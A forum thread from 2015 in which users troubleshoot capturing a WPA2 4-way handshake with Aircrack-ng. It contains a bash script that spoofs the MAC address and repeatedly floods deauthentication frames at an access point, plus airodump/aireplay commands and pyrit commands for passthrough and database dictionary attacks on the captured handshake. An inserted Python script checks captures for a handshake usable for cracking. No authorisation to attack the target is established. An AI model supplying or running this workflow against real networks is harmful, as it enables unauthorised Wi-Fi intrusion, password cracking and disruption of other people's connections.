GarrettVD, posted October 11, 2015 (edited October 11, 2015 by GarrettVD)

I'm trying to capture a 4-way WPA handshake using the Aircrack-ng suite of tools. The first issue was that, despite being in very close proximity, I was unable to see any clients in the terminal or .csv logs while running airodump-ng targeting a specific BSSID on channel 1 and sending a few mass (i.e. not targeted to a specific client MAC) deauths every 15 seconds. No clients in the .csv logs, yet I was able to see lots of probe responses from clients on the network, beacons, etc. (See screenshot #1.)

So I then tried to target a specific device MAC address on the network (screenshot #2). The device appeared in the CSV log under Station MACs. But still, no WPA handshakes. Weird. So I checked the logs, and I can see that there is communication to the AP from the client, and vice versa, but no handshakes. Hmmm.

Excerpt from the airodump-ng CSV log:

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
6C:19:8F:E5:G5:1E, 2015-10-10 00:37:36, 2015-10-10 00:40:09, 1, 54, WPA2, CCMP TKIP, PSK, -54, 1106, 96, 0. 0. 0. 0, 6, KingEagle,

Using the following script:

#!/bin/bash
# Tear down any monitor interface left over from a previous run and take both radios down
airmon-ng stop wlan1mon
ifconfig wlan1 down
ifconfig wlan0 down
# Randomise the capture card's MAC, bring it back up and put it in monitor mode on channel 1
macchanger -r wlan1
ifconfig wlan1 up
airmon-ng start wlan1 1
# Capture only the target BSSID on channel 1, writing to the USB stick, detached in the background
airodump-ng -c 1 --bssid 6C:19:8F:E5:G5:1E --showack --write /usb/airdump-log wlan1mon </dev/null &>/dev/null &
# Every 15 seconds send 5 broadcast deauths (no -c, so not aimed at a single client)
while sleep 15; do
    aireplay-ng -0 5 -a 6C:19:8F:E5:G5:1E wlan1mon --ignore-negative-one
done

I'm attaching a screenshot of the probe responses and deauthentication packets. Any help would be great!

Thanks,

Screenshot #1 - Mass Deauthentication
Screenshot #2 - Targeting HonHai___
hairbag, posted October 11, 2015 (edited October 11, 2015 by hairbag)

# put the card in monitor mode by hand (no airmon-ng), with a random MAC
ifconfig wlan1 down
macchanger -r wlan1
iwconfig wlan1 mode monitor
ifconfig wlan1 up
# capture the target BSSID on its channel, writing NETGEAR-NN.cap
airodump-ng -c 10 -w /path/to/Capture/output/NETGEAR --bssid 00:11:22:33:44:55 wlan1
# deauth client MAC 5x (second terminal)
aireplay-ng -0 5 -e NETGEAR -c 00:11:22:33:44:55 wlan1
GarrettVD, posted October 11, 2015

Isn't that pretty much the same thing?
hairbag, posted October 11, 2015

You are outputting to a virtual device or file, I think? How do you analyze the captured handshakes? Different method of implementing the monitor mode too.
GarrettVD, posted October 12, 2015

Yeah, logging to /usb/, which is just a USB stick mounted via fstab. Checking for handshakes in Wireshark using the .cap file, filtering with the filter "eapol".
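As an added example, not code from the thread: the script below does by hand what the Wireshark "eapol" filter shows interactively. It walks an airodump-ng .cap (classic pcap, link type 802.11 or radiotap), keeps only cleartext EAPOL-Key data frames, classifies each one as handshake message 1 to 4 from its Key Information bits, and reports per (BSSID, station) pair which messages were seen and whether that is enough for aircrack-ng. The AP and client MACs, the frames and the two sample captures are constructed inline (hypothetical values) so it runs offline; to use it on a real capture, pass the file's bytes to handshake_messages().

```python
"""Check an airodump-ng .cap for a usable WPA/WPA2 4-way handshake (added example)."""
import struct

# EAPOL-Key "Key Information" flag bits (IEEE 802.11 RSN key descriptor)
KEY_INSTALL, KEY_ACK, KEY_MIC, KEY_SECURE = 1 << 6, 1 << 7, 1 << 8, 1 << 9
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP header, EtherType 0x888E
DLT_IEEE802_11, DLT_RADIOTAP = 105, 127


def classify_eapol_key(key_info):
    """Return 1..4 for the handshake message a Key Information value denotes, else None."""
    ack, mic = key_info & KEY_ACK, key_info & KEY_MIC
    install, secure = key_info & KEY_INSTALL, key_info & KEY_SECURE
    if ack and not mic:
        return 1                      # AP -> STA: ANonce, no MIC yet
    if ack and mic and install:
        return 3                      # AP -> STA: ANonce again, MIC, Install
    if mic and not ack and not secure:
        return 2                      # STA -> AP: SNonce + MIC
    if mic and not ack and secure:
        return 4                      # STA -> AP: final MIC
    return None                       # group-key handshake or malformed


def iter_pcap(data):
    """Yield (linktype, frame_bytes) for each record of a classic pcap file."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic in (0xA1B2C3D4, 0xA1B23C4D):
        endian = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype = struct.unpack_from(endian + "I", data, 20)[0]
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack_from(endian + "I", data, off + 8)[0]
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def eapol_key_from_frame(frame, linktype):
    """Return (bssid, sta, key_info) if frame is a cleartext EAPOL-Key data frame, else None."""
    if linktype == DLT_RADIOTAP:
        frame = frame[struct.unpack_from("<H", frame, 2)[0]:]   # strip the radiotap header
    elif linktype != DLT_IEEE802_11:
        return None
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2:         # only Data frames carry EAPOL
        return None
    if fc1 & 0x40:                    # Protected bit: encrypted payload, not a handshake frame
        return None
    to_ds, from_ds = fc1 & 0x01, fc1 & 0x02
    if to_ds and from_ds:             # 4-address WDS frames are not a client handshake
        return None
    hdr_len = 26 if fc0 & 0x80 else 24  # QoS Data subtype adds a 2-byte QoS Control field
    a1, a2 = frame[4:10], frame[10:16]
    bssid, sta = (a1, a2) if to_ds else (a2, a1)
    body = frame[hdr_len:]
    if not body.startswith(LLC_SNAP_EAPOL):
        return None
    eapol = body[8:]
    if len(eapol) < 7 or eapol[1] != 3:  # EAPOL packet type 3 = EAPOL-Key
        return None
    return bssid, sta, struct.unpack_from(">H", eapol, 5)[0]   # Key Information follows the descriptor type


def handshake_messages(pcap_bytes):
    """Map (bssid, sta) -> sorted list of handshake message numbers present in the capture."""
    seen = {}
    for linktype, frame in iter_pcap(pcap_bytes):
        hit = eapol_key_from_frame(frame, linktype)
        if hit is None:
            continue
        bssid, sta, key_info = hit
        msg = classify_eapol_key(key_info)
        if msg is not None:
            seen.setdefault((bssid, sta), set()).add(msg)
    return {pair: sorted(msgs) for pair, msgs in seen.items()}


def usable_for_cracking(msgs):
    """aircrack-ng needs the client's M2 (SNonce + MIC) plus the AP's ANonce from M1 or M3."""
    return 2 in msgs and (1 in msgs or 3 in msgs)


# --- constructed sample data (hypothetical MACs, not a real capture) ---
AP, STA = bytes.fromhex("6c198fe5a51e"), bytes.fromhex("001122334455")


def build_eapol_frame(to_ds, key_info, protected=False):
    """Minimal 802.11 Data frame carrying an EAPOL-Key with the given Key Information."""
    fc = bytes([0x08, (0x01 if to_ds else 0x02) | (0x40 if protected else 0)])
    a1, a2 = (AP, STA) if to_ds else (STA, AP)
    header = fc + b"\x00\x00" + a1 + a2 + AP + b"\x00\x00"        # duration, addr1-3, seq ctrl
    key_body = b"\x02" + struct.pack(">H", key_info) + bytes(92)  # RSN descriptor, key info, zeroed fields
    eapol = b"\x02\x03" + struct.pack(">H", len(key_body)) + key_body  # version 2, type EAPOL-Key
    return header + LLC_SNAP_EAPOL + eapol


def build_pcap(frames, linktype=DLT_IEEE802_11):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1444435056 + i, 0, len(f), len(f)) + f
    return out


BEACON = bytes([0x80, 0x00, 0, 0]) + b"\xff" * 6 + AP + AP + b"\x00\x00" + bytes(12)  # mgmt frame, ignored
# Typical Key Information values: M1 0x008a, M2 0x010a, M3 0x13ca, M4 0x030a
FULL_HANDSHAKE = build_pcap([BEACON, build_eapol_frame(False, 0x008A), build_eapol_frame(True, 0x010A),
                             build_eapol_frame(False, 0x13CA), build_eapol_frame(True, 0x030A),
                             build_eapol_frame(True, 0x010A, protected=True)])   # encrypted, must be skipped
M1_ONLY = build_pcap([BEACON, build_eapol_frame(False, 0x008A), build_eapol_frame(False, 0x008A)])

if __name__ == "__main__":
    for name, cap in (("full", FULL_HANDSHAKE), ("m1-only", M1_ONLY)):
        for (bssid, sta), msgs in handshake_messages(cap).items():
            print(f"{name}: {bssid.hex(':')} <-> {sta.hex(':')} messages {msgs} usable={usable_for_cracking(msgs)}")
```

The M1_ONLY capture is the pattern behind the symptom in this thread: after a deauth the AP re-sends message 1, but if the client never answers with message 2 there is nothing carrying a MIC to crack, and a Wireshark "eapol" filter will show traffic without there being a usable handshake. Only the cleartext EAPOL-Key frames are counted; data frames with the Protected bit set are skipped because the handshake itself is never encrypted.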
hairbag, posted October 13, 2015 (edited October 13, 2015 by hairbag)

I haven't played with Wireshark enough to comment on it, but above is what I've used and it always works. Not sure about your script, as I just do it manually in two terminal windows: one for capture and one for deauth. After capture, analyze with pyrit if you are set up for GPU processing.

# analyze
pyrit -r /path/to/capture/files/SSID-01.cap analyze
# strip and clean cap file
pyrit -r /path/to/capture/files/SSID-01.cap -o /path/to/capture/files/SSID-01.cap.gz strip
# passthrough attack
pyrit -r /path/to/capture/files/SSID-01.cap.gz -i /path/to/password/files/superWPA.lzma -b 11:22:33:44:55:66 attack_passthrough

or database:

# import passwords
pyrit -i /path/to/password/files/superWPA.lzma import_unique_passwords
# add ssid to database
pyrit -e SSID create_essid
# batch process rainbows
pyrit batch
# attack cap file
pyrit -r /path/to/capture/files/SSID-01.cap.gz attack_db --all-handshakes
# delete ssid from db
pyrit -e SSID delete_essid
GarrettVD, posted October 13, 2015

That's all true, man, but where I'm having the issue is with capturing the initial 4-way handshake.
hairbag, posted October 13, 2015

Open up two terminals, and if you aren't seeing clients and the SSID in the airodump window you won't get handshakes. Deauth won't work unless your NICs support injection. I remember seeing something somewhere about non-patched drivers and having to use --ignore-negative-one to avoid errors. What type of network adapters are you using? Buy some Alfas and you will do the dance of joy. In your script you put wlan0 down after putting wlan1 in monitor mode... try on wlan0. Try airodump-ng wlan0 --manufacturer --wps; if you don't get a big list of all your neighbors' wifi then your NIC is the issue.